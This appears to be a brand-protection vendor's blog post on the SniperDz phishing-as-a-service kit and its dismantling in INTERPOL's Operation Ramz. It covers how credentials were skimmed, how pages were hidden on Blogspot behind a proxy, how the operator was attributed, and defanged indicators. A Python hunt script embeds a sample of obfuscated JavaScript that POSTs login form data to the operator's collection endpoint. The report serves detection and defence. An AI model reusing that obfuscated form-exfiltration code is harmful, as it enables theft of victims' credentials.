
SniperDz: Phishing-as-a-Service, Dismantled


SniperDz takedown — a phishing-as-a-service kit storefront with a red takedown slash and a green seizure seal, over the INTERPOL Operation Ramz figures.

For more than a decade, anyone who wanted to run a phishing campaign but lacked the skill to build one had a free option. It was called SniperDz — also written Sniper Dz — a phishing-as-a-service (PhaaS) platform that handed out ready-made fake login pages, hosted them on legitimate services to slip past filters, and charged its users nothing up front. In mid-2026, that decade ended: INTERPOL, working with threat-intelligence firm Group-IB and national police across 13 countries, dismantled the operation and arrested its administrator as part of Operation Ramz.

The scale is the headline. Palo Alto Networks' Unit 42 discovered more than 140,000 SniperDz phishing websites in a single year of tracking; Group-IB's takedown investigation tied the ecosystem to 20,000-plus unique domains, 80 templates impersonating 30-plus global brands, and tens of thousands of stolen credentials. SniperDz did all of this while presenting itself, to the low-skill criminals who used it, as a generous free service — and quietly stealing from them, too.

That combination — disposable lookalike domains, brand-impersonation kits, and throwaway hosting on trusted platforms — is exactly the infrastructure PhishEye tracks every day. The SniperDz takedown is a rare look inside a PhaaS operation from the moment it was switched on to the moment the cuffs went on. Here is how it worked, how investigators unmasked the person behind it, the indicators to hunt for, and what the case tells defenders about the phishing economy that outlives any single arrest.

At a glance
Operation: SniperDz / Sniper Dz (also operated as Joker Dz, Storm Dz, Spam Dz)
Type: Phishing-as-a-service (PhaaS) — free fake-login kits + hosting
Active: ~2015–2025 (roughly a decade)
Scale: 140,000+ phishing sites in one year (Unit 42); 20,000+ domains, 80 templates, 30+ brands (Group-IB)
Takedown: INTERPOL Operation Ramz with Group-IB, Oct 2025 – Feb 2026
Result: 201 arrests across 13 MENA countries; administrator "Guedz" arrested in Algeria

What SniperDz was: free phishing, at scale

Phishing-as-a-service is exactly what it sounds like — the software-as-a-service model applied to crime. Instead of coding a convincing PayPal or Instagram login clone, a would-be phisher rents (or, in SniperDz's case, simply takes) a finished one from a platform that handles the templates, the hosting tricks, and the credential collection. PhaaS is the single biggest reason phishing volume keeps climbing: it removes the one barrier that ever kept unskilled actors out, which is skill.

SniperDz industrialized that model and ran it for about ten years. According to the Group-IB and Unit 42 research, the platform offered:

  • 80 ready-made phishing templates cloning the login pages of more than 30 major brands, including PayPal, Facebook, Instagram, Yahoo, Netflix, and Steam.
  • Multi-language support — Arabic, English, and French for core operations, with Spanish and Hebrew kits that were retired around 2020.
  • A Telegram channel (latterly t.me/JokerDzV2) used to distribute tutorials and sustain a decade-long community of users; Unit 42 counted 7,156 subscribers and a single tutorial video with 72,600 views in August 2024.
  • An administrator panel that surfaced everything the kits captured — username, password, template name, timestamp, and the victim's IP address and country — in near real time.

Over its life the ecosystem touched more than 20,000 unique domains, and Unit 42 alone discovered 140,000-plus distinct phishing pages in one year of tracking from July 2023. The platform rebranded repeatedly — surfacing as Joker Dz, Storm Dz, and Spam Dz — but the operator, the playbook, and the infrastructure underneath stayed recognizably the same.

"Free" was the funnel — and SniperDz robbed its own users

A free phishing platform raises an obvious question: where is the money? SniperDz answered it twice over, and the second answer is the part defenders should sit with.

Charging nothing is a deliberate growth strategy. Zero price means zero friction, which means volume — thousands of low-skill users deploying thousands of phishing pages. But SniperDz did not simply give the tooling away. Unit 42 found that the platform secretly exfiltrated a copy of every credential its users phished to a central endpoint, raviral[.]com/k_fac.php, controlled by the SniperDz operators — separate from, and in addition to, the phisher who actually ran the campaign. In Unit 42's words, the operators "collect victim credentials stolen by phishers who use their platform to compensate for the cost of service."

In other words, the "free" tier was a double-cross. The amateur phisher thought they were getting free infrastructure; in reality they were unpaid labour, deploying pages whose entire take was silently mirrored back to the people who built the kit. On top of that skim, victims were funneled into carrier-billing fraud, premium-rate SMS subscriptions, and browser-notification abuse — squeezing revenue out of people whether or not their credentials were the prize. SniperDz turned a crowd of amateur phishers into a distribution network it didn't have to pay and quietly collected on every end at once.

Unique tactics: hiding phishing pages on trusted platforms

Two technical tricks, documented by Unit 42, explain much of SniperDz's longevity.

Hosting on legitimate platforms. The admin panel included an automated tool that reformatted standard HTML phishing pages into Blogger (Blogspot)-compatible templates, so operators could serve their fake login pages from a reputable Google-owned host rather than from obviously malicious infrastructure. A phishing page served from a trusted domain inherits that domain's good reputation — it is less likely to be blocked, more likely to render past corporate proxies, and more convincing to a victim glancing at the address bar.

Proxy concealment. SniperDz routed delivery through a legitimate public proxy (proxymesh[.]com) so that a victim's browser — or a security crawler — would see the proxy as responsible for loading the phishing content, masking the platform's actual backend (dev-cdn370.pantheonsite[.]io). The page's JavaScript was heavily obfuscated with String.fromCharCode and unescape to hide the exfiltration URLs and HTML from casual inspection.

Combine those with a constant churn of cheap, newly registered lookalike domains as the entry points, and you get the sprawling footprint investigators ultimately mapped — most of it disposable by design, rotating faster than blocklists could keep up.

[Infographic: How the SniperDz phishing-as-a-service model worked. A free platform that collected on both ends.]
  1 · Operator "Guedz" ships 80 free kits plus Blogspot hosting (Telegram: 7,156 subscribers).
  2 · Amateur users deploy fake logins for PayPal, Meta, Netflix, Steam… (140,000+ pages).
  3 · Victims enter credentials on a trusted-looking page.
  4 · Double-cross: a copy is skimmed to the operator at raviral[.]com.
  5 · Cash out: credential sale · carrier billing · premium SMS.
The users paid nothing and did the work; SniperDz monetized the credentials and the traffic — and skimmed a copy for itself. Sources: Palo Alto Unit 42 · Group-IB investigation into Sniper Dz · INTERPOL Operation Ramz.
Figure 1. The SniperDz funnel. A no-cost platform converts a crowd of low-skill users into an unpaid phishing distribution network — and steals the take a second time.

Operation Ramz: the takedown

SniperDz came down inside Operation Ramz, an INTERPOL-coordinated crackdown on phishing, malware, and cyber-scam infrastructure across the Middle East and North Africa, run between October 2025 and February 2026. Thirteen nations took part: Algeria, Bahrain, Egypt, Iraq, Jordan, Lebanon, Libya, Morocco, Oman, Palestine, Qatar, Tunisia, and the United Arab Emirates.

The headline numbers from Operation Ramz:

Metric | Figure
Arrests | 201
Additional suspects identified | 382
Victims identified | 3,867
Servers seized | 53
Compromised accounts flagged by Group-IB | 5,000+ (including government infrastructure)

Group-IB's role was the intelligence backbone — it shared details of active phishing infrastructure and a list of thousands of compromised accounts that gave national units something concrete to act on. In Algeria, that thread led directly to SniperDz: police arrested the administrator and seized the hardware running the platform — servers, computers, phones, and hard drives loaded with phishing software and scripts.

The operation also surfaced the human cost behind the scams. In Jordan, a raid on a financial-fraud operation found 15 people working the scheme — and investigators determined they were human-trafficking victims coerced into the fraud, not willing participants. Two suspected orchestrators were arrested. It is a reminder that the "scam economy" PhaaS feeds is frequently staffed by people who are themselves victims.

Unmasking "Guedz"

The most instructive part of the case is how investigators tied a decade of rotating brand names back to one person. None of it required breaking the platform's encryption — it required patience and open-source intelligence.

Group-IB's attribution leaned on the operator's own digital exhaust:

  • Tutorial videos that leaked operational details. Screen recordings posted to promote the platform inadvertently exposed administrator email addresses and live accounts — a self-inflicted wound common among operators who treat their criminal enterprise like a normal software product.
  • WHOIS correlation across rebrands. Historical domain-registration records linked the platform's successive identities — including domains such as hero-egy[.]com, stormdz[.]com, and jokerdz[.]com — back to common registrant fingerprints.
  • A ten-year social and Telegram trail. Posting history across social platforms and a long-running Telegram channel documented the platform's evolution in the operator's own words.
  • Group-IB's Investigation Graph, which stitched the technical indicators to the public digital footprint until a single individual — handle "Guedz" — sat at the center of the graph.

That person was arrested by the Algerian National Police. The lesson for defenders is that attribution is cumulative: a rebrand resets the marketing, not the history, and ten years of small operational mistakes eventually compound into an identity.

Indicators of compromise (IoCs)

Defanged with [.] — re-fang by replacing [.] with . before loading into tooling. The sample indicators below come from a malware-sandbox detonation of a SniperDz phishing page; the platform indicators are from Unit 42; the historical domains span the rebrands.

Sample infrastructure

Type | Indicator | Notes
Domain | aff.bnaosf1he[.]shop | SniperDz phishing host
Domain | win.anababayala[.]com | SniperDz phishing host
Domain | win.feezossl[.]xyz | SniperDz phishing host
IPv4 | 184.154.10[.]254 | US · AS32475 SingleHop LLC
IPv4 | 65.60.9[.]236 | US · AS32475 SingleHop LLC

Platform & operator infrastructure (Unit 42)

Type | Indicator | Role
Exfil endpoint | raviral[.]com/k_fac.php | Central credential collection (operator-controlled)
Backend | dev-cdn370.pantheonsite[.]io | Origin masked behind the proxy
Proxy abused | proxymesh[.]com | Legitimate proxy used to hide the backend
Host abused | Blogspot / blogger.com | Phishing pages auto-converted to Blogger format

Historical aliases & channels (Group-IB)

Type | Indicator
Platform aliases | SniperDz / Sniper Dz · Joker Dz · Storm Dz · Spam Dz
Historical domains | hero-egy[.]com · stormdz[.]com · jokerdz[.]com
Telegram | t.me/JokerDzV2 (7,156 subscribers, Aug 2024)

Behavioral signal to hunt: JavaScript using String.fromCharCode and unescape to assemble exfiltration URLs, plus outbound POSTs to a credential-collection endpoint that does not match the page's apparent brand or host.
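A hunt rule for the behavioral signal just described, added here as an example and not Unit 42's or PhishEye's own tooling: it statically folds String.fromCharCode and unescape calls into literals, joins the concatenated pieces, flags any URL whose host is not the page's own, and matches those URLs against the defanged indicators above after re-fanging them. The sample JavaScript and the blogspot page host are constructed for the demonstration.

```python
import re
from urllib.parse import unquote, urlparse

# Operator indicators as published on this page (defanged with [.]).
DEFANGED_IOCS = ["raviral[.]com/k_fac.php", "dev-cdn370.pantheonsite[.]io"]

# Constructed sample of the obfuscation pattern, not a real captured page:
# it assembles "https://" + "raviral.com/k_fac.php" and POSTs the login form to it.
SAMPLE_JS = (
    'var u = String.fromCharCode(104,116,116,112,115,58,47,47) + '
    'unescape("%72%61%76%69%72%61%6c%2e%63%6f%6d%2f%6b%5f%66%61%63%2e%70%68%70");'
    'fetch(u, {method: "POST", body: new FormData(document.forms[0])});'
)
SAMPLE_HOST = "secure-login-example.blogspot.com"  # constructed page host


def refang(indicator: str) -> str:
    """Turn a defanged indicator ([.]) back into its live form."""
    return indicator.replace("[.]", ".")


def deobfuscate(js: str) -> str:
    """Fold String.fromCharCode(...) and unescape("...") into string literals,
    then join adjacent literals concatenated with '+'."""
    js = re.sub(r"String\.fromCharCode\(([\d,\s]*)\)",
                lambda m: '"' + "".join(chr(int(c)) for c in re.findall(r"\d+", m.group(1))) + '"',
                js)
    js = re.sub(r"unescape\(\s*[\"']([^\"']*)[\"']\s*\)",
                lambda m: '"' + unquote(m.group(1)) + '"',
                js)
    return re.sub(r"\"\s*\+\s*\"", "", js)


def hunt(page_host: str, js: str) -> dict:
    """Report obfuscation use, URLs pointing off the page's host, and IoC matches."""
    obfuscated = bool(re.search(r"String\.fromCharCode|unescape\(", js))
    urls = re.findall(r"https?://[^\s\"'<>]+", deobfuscate(js))
    external = [u for u in urls if urlparse(u).hostname != page_host]
    hits = [u for u in external if any(refang(i) in u for i in DEFANGED_IOCS)]
    return {"obfuscated": obfuscated, "external_exfil": external, "ioc_hits": hits}


if __name__ == "__main__":
    print(hunt(SAMPLE_HOST, SAMPLE_JS))
```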

What the SniperDz takedown means for defenders

A 201-arrest operation is a genuine win, but it is worth being clear about what it does and does not change for the brands these kits impersonate.

  • PhaaS has permanently lowered the barrier. The skill that once gated phishing is gone; the cost is often zero. Even with SniperDz dismantled, dozens of comparable kits and storefronts remain, and the demand it served has not evaporated.
  • Kits respawn under new names. SniperDz itself rebranded three times. Expect the templates, the legitimate-host abuse, and the disposable-domain playbook to resurface under different branding. The infrastructure pattern is more durable than any one platform.
  • The durable defense is detection and takedown, not waiting for the police. Law enforcement disrupts the supply of kits; brand protection disrupts the deployment of individual phishing sites that target you, in days rather than years. The two are complementary, and only one of them happens on your timeline.
  • Watch the trusted platforms, not just shady TLDs. SniperDz's edge was hosting on Blogspot behind a proxy. Monitoring has to cover lookalike pages on reputable hosts, not only newly registered domains.

For any brand on SniperDz's target list — payment platforms, social networks, streaming and gaming services, and the long tail of companies whose logins are worth stealing — the practical takeaway is that you cannot rely on a once-a-decade takedown. You need continuous discovery of lookalike domains and fake login pages, plus a takedown pipeline that removes them before they collect a meaningful number of credentials.

How PhishEye fits in

The SniperDz case is a clean illustration of the threat PhishEye is built to counter: a brand's login page, cloned into a kit, deployed across thousands of disposable lookalike domains, and hosted on trusted platforms to dodge reputation filters.

PhishEye continuously discovers lookalike and impersonation domains, fake login and brand-clone pages, and the throwaway infrastructure attackers stage them on — then ships evidence and runs coordinated takedowns across registrars, hosts, and platforms, including abuse-of-trust hosting like Blogspot and other legitimate services. Pair that with dark web and AI monitoring to catch the credentials and brand mentions that surface after a successful steal, and you compress both halves of the timeline: how long a phishing page survives, and how long stolen credentials stay useful. If you want to gut-check a suspicious link yourself, the free phishing URL checker flags throwaway TLDs, lookalike hosts, and other red flags in seconds.

Frequently asked questions

What is SniperDz? SniperDz (also written Sniper Dz) was a phishing-as-a-service platform active for roughly a decade. It gave low-skill criminals free, ready-made phishing kits — fake login pages cloning major brands — along with hosting tricks to keep them online, while the operators secretly skimmed a copy of every stolen credential and monetized victim traffic. It also operated under the names Joker Dz, Storm Dz, and Spam Dz.

Is it spelled SniperDz or Sniper Dz? Both. Security vendors and INTERPOL use the two-word form "Sniper Dz," while the one-word "SniperDz" is common in coverage and search. They refer to the same phishing-as-a-service platform.

What is phishing-as-a-service? Phishing-as-a-service is the crime equivalent of software-as-a-service: a platform supplies finished phishing templates, hosting, and credential-collection infrastructure so that buyers (or, with SniperDz, free users) can run campaigns without building anything. It is a major driver of rising phishing volume because it removes the skill barrier.

What was Operation Ramz? Operation Ramz was an INTERPOL-coordinated operation against phishing, malware, and scam infrastructure across 13 Middle East and North Africa countries, run from October 2025 to February 2026 with intelligence from Group-IB. It resulted in 201 arrests, 53 seized servers, and the dismantling of SniperDz, whose administrator was arrested in Algeria.

Who was behind SniperDz? Group-IB attributed the platform to an operator using the handle "Guedz," identified through OSINT — including tutorial videos that leaked administrator accounts, WHOIS correlations across the platform's rebrands, and a ten-year social and Telegram trail. The administrator was arrested by the Algerian National Police.

Does this takedown end the phishing-as-a-service threat? No. The arrest disrupts one major supplier, but PhaaS as a model is firmly established, and comparable kits remain available. SniperDz rebranded three times during its life; the templates and disposable-domain playbook are likely to resurface elsewhere. Continuous brand monitoring and fast takedown remain the practical defense for targeted brands.

My brand's login page is being cloned — what can I do? Get continuous discovery of lookalike domains and fake login pages, then move quickly to takedown. PhishEye detects and removes impersonation pages across registrars, hosts, and platforms; you can also report and remove a single page using our guide on how to take down a phishing website.
